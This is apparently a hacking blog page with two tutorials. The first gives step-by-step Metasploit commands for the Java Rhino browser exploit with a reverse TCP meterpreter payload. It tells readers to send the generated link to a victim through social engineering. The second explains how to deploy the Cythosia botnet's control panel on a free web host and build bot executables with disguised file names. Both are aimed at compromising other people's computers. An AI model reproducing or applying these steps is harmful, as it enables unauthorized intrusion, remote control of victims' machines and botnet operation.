Backtrack java rhino exploit

5:11 pm , 0 comments
Browser Java Rhino exploit Tutorial


we are going to pwn windows 7 with a java exploit called: JAVA RHINO Exploit. Here i quote from the Armitage console's description of the exploit:" This module exploits a vulnerability in the Rhino Script Engine that can be used by Java Applet to run an arbitrary code outside of the sandbox" The vulnerability affects version 7 and earlier versions, and should work on any browser: firefox, safari, internet explorergoogle chrome etc...
First of all, you have to update the metasploit svn by the custom command #msfupdate , to make sure that the above exploit is included in your Backtrack exploits database. Then run:

 #msfconsole

Then use this exploit:

#use exploit/multi/browser/java_rhino

Next set payload:

#set payload/java/meterpreter/reverse/tcp
backtrack, hacking, windows, metasploit, firefox, penetration testing


At this level, type these commands, the first one is meant to set up the server:

 #set srvhost 192.168.1.6

In this case: 192.168.1.6 is my internal ip, you have to change this value with your own ip. If you don't know how to get your ip address, just open a ternimal and type: #ifconfig.The next command will define the port of the server which is usually port 80.

 #set srvport 80

Next command is for setting up the path of the exploit:

 #set uripath java_rhino

# set lhost 192.168.1.6

#set lport 443




Notice also that the srvhost & the lhost have the same ip address. Finally, type this command and wait for a connection:
#exploit
backtrack, hacking, windows, metasploit, firefox, penetration testing





A link has been generated : Local IP://192.168.1.6:80/java_rhino, you have to copy the link and send it to your victim. Once you succeed in "social engineering" the link to a victim, the sending stage starts, and you'll have a java meterpreter session.


backtrack, hacking, windows, metasploit, firefox, penetration testing

A meterpreter session will be created.
That's it Windows 7 is pwned  =)

0 comments:

Setup cythosia Bot

3:35 pm , 2 comments
Tutorial to install cythosia Bot



Requirements:
- Cythosia bot,
- A web host on http://www.000webhost.com/ or any other web host but this one is for free.


First Step:
Login into your webhost account or register and get into your web host. The website takes you to a page where you have": List of your domains."
Click on go to cPanel of the domain you've just made.


Second Step:
Scroll down the new page that is open and click on "File Manager" in the " Files" section.
note: If the site asks for a login, enter the password of your account.
Having a new page open, Open the document called " public_html",
There, Click the upload button,
You'll be redirected to a page where is:
Files
Files entered here will be transferred to the FTP server.
And
Archives (zip, tar, tgz, gz)
Archives entered here will be decompressed, and the files inside will be transferred to the FTP server.
- Under the archives section, click " Choose File". and choose the " webPanel zip archive that just came after you've extracted the download one. After that click the "Check" above the : "Upload to directory" and wait a few seconds.


Third Step:
Return back to the first page of the File manager.
Now to configure the files you've just uploaded so the bot could work, you have to enter the webpanel folder on your webhost and click on Chmod after selecting all the files in it. You get redirected to : "Chmod directories and files" there change the Chmod value of the files to 777 and click the Check mark button.


Forth step:
Now you can exit the window your are in, and return to the members area: " Cpanel". There scroll down until you see : "» Software / Services", inside that section, click the one named after " MySQL ".
Create a new database with the username, database name and password you want, but keep them in your mind or save them somewhere.


Fifth Step:
Return back to the CPanel and click the " phpMyAdmin " in the same section as of the MySQL one. Press Enter phpMyAdmin to the database you've just created. A new window will open, in the one that just opened click, Import, the file that we must choose is the one named dump which is located in the Webpanel folder that you've extracted also in the beginning, select it and press " GO ". After doing that, you can now close that window.

Sixth Step:
Get Back to the Cpanel and press file manager again, Navigate to:
/public_html/Botnet/Webpanel/admin/inc
And Edit the config.php file, Edit it with the details of the Mysql Database, username and password you've just created.
Finally, save the file and exit the window.


Seventh Step:
Enter the domain of your webhost, you'll get to put a password, Type in " admin ".

*Creating a bot:
To create your bot just Open " CythBuilder " and change the " Domain " thing to your domain. After that you can change " 1.0.6 [beta] [23-03-2011]" to a name of your choice. And the " Drop Name.exe " to the file name you want to appear.
Extract the file you just downloaded to your desktop.


Download here

2 comments:

Subscribe to: Posts (Atom)